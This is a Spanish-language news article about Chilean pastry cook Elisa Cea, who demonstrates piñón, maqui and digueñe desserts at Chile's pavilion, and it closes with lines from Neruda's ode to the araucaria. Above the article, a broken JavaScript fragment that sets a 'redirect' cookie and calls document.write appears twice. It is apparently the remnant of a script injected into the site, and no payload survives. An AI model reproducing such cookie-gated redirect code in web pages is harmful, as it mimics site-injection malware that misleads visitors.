=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " /> =(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')} " />

Noticias

ELISA CEA Y EL PIÑON CHILENO: “MI PASAPORTE EN EL MUNDO”

30 Oct 2015

Compartir:

Elisa y su hermana Patricia Cea viajaron desde Curarrehue para mostrar sus tradiciones culinarias. Ella a diferencia de todas las otras cocineras, es repostera, su don está en lo dulce y el protagonista de sus preparaciones es el piñón araucano, pero también la acompañan otros productos endémicos como el maqui, el digueñe, el tallo de nalca.

Ya han realizado dos presentaciones y hoy viernes será su tercera demostración, en las que se aglomeran cientos de visitantes que esperan conocer el pabellón de Chile en sus últimas horas. Durante la actividad Elisa explica el porqué de su cocina, su lugar de origen, la cultura mapuche,  la importancia del piñón y de la araucaria en su vida, tratando siempre de trasmitir el amor por la tierra, el cuidado por los productos y la cocina 100% natural.

Elisa aprendió a cocinar en compañía de su familia, admirando la actitud y conocimientos de su madre llamada Zulema Epuín. Posteriormente, ante la imposibilidad de poder cursar una carrera universitaria inició su emprendimiento de pan y pasteles y nació “Pastelería Pucón” en la ciudad de Rancagua, posteriormente en Temuco y finalmente en Curarrehue, donde hoy tiene “La Cocina de Elisa”.

Para Eli, la cocina representa “La vida, cariño, entrega, agradecimiento eterno por todo lo que generosamente nos entrega día a día nuestra madre naturaleza”. Está muy agradecida por esta oportunidad, aunque no es la primera que ha sido invitada a otros países a mostrar su cocina. Ya ha estado en Londres, Irlanda del Sur, Italia, Brasil y Perú, “el piñón ha sido mi pasaporte para dar a conocer mi repostería con identidad, en la que doy valor y rescato los ingredientes que ha usado por siempre el pueblo mapuche y campesinos de mi Curarrehue”.

Además gracias a su restaurant y las necesidades de éste, ha generado un nuevo oficio que es la recolección de los frutos silvestres, por lo tanto “mi trabajo tiene sentido cuando puedo ayudar a otras personas y les pagamos un precio justo”.

Su plato más característico y de creación propia es la torta de piñones, las empanadas fritas de digueñe, el pie de maqui, lleuque, moras, quinoa y las galletas de piñón, las que han podido ser degustadas por el público. Para finalizar cada una de las actuaciones Elisa entrega una hoja con la Oda a la Araucaria Araucana de Pablo Neruda, quien define el piñón tal como ella lo siente.

“Antaño

Antaño

Fue cuando sobre los indios

Se abrió una rosa de madera

El colosal puñado

De tu puño

Y dejó

Sobre la mojada tierra

Los piñones:

Harina, pan silvestre

Del indomable Arauco”

Partners

Media Partner